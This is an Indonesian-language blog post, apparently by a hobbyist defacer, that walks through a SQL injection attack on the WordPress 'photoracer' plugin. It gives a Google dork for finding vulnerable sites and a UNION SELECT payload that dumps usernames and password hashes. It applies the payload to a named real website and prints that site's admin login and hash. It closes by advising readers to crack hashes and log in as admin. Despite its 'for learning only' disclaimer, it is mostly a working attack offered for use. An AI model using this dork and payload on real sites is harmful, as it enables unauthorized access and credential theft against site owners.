udah pada sarapan lum nih 
yoo wes langsung ajah yooo sinchankeke sharePOC exploit wordpress nya 
......
......
pertama agan siapin kopi + rokok + cemilan cepuluh cebelas 
dork silahkan agan kembangkan lagi kalo ane pake dork yang di bawah ini 
kalo ane pake dork yang di bawah ini DORK inurl:"wp-content/plugins/photoracer/viewimg.php?id="
EXPLOIT +union+select+1,2,3,4,5,concat(user_login,0x3a,user_pass),7,8,9+from+wp_users--agan masukan DORK tadi ke search engine google lalu agan cari lah targetnya yang bisa di eksekusi pake exploit dia atas
gini contoh targetnya yg ane ambil dari google
http://www.chicasrider.cl/wp-content/plugins/photoracer/viewimg.php?id=1
nah agan masukin dah exploit di atas tadi ke belakang angka nomer 1
maka jadinya seperti ini sob http://www.chicasrider.cl/wp-content/plugins/photoracer/viewimg.php?id=-1+union+select+1,2,3,4,5,concat(user_login,0x3a,user_pass),7,8,9+from+wp_users--.
edbong:$P$BZJ19WTKx7P8mOQm6v7frYsuEsoIYg1
sayang sekali gan target ane password nya ada symbol $$ (salt) sampai saat ini ane belom nemuin cara crack password yg type begitu
kalo agan tau cara decrypnya berbagi disini yah nanti ane update postingannya sukur sukur kalo agan nemu passwordnya yang type md5 ga pake salt langsung ajah deh agan crack di web md5 decrypter online lalu agan login sebagai admin web nya
NB : tutor ini ane buat bukan untuk di salah gunakan....tutor ini untuk pembelajaran saja supaya admin admin web terutama admin web indonesia tercinta yang memakai CMS wordpress bisa meng antisipasi serangan dari defacer defacer nakal yang sedang keliaran mencari mangsanya,,ane ga bertanggung jawab jika tutor ini di salah gunakan dan merugikan orang lain apa lagi sampe agan ketangkep unit CYBER CRIME
ihh ngeri dehh gan ...sekian dulu coretan sinchankeke ganteng di pagi hari yang cerah ini,,,nanti ane akan share cara upload backdor atau shell ke dalam wordpress.....cekidot gan jangan lupa komentarnya wassalam
.jpg)
Heker pasti nih
BalasHapus:( bukan kak...yg heker tuh atas ane :))
BalasHapus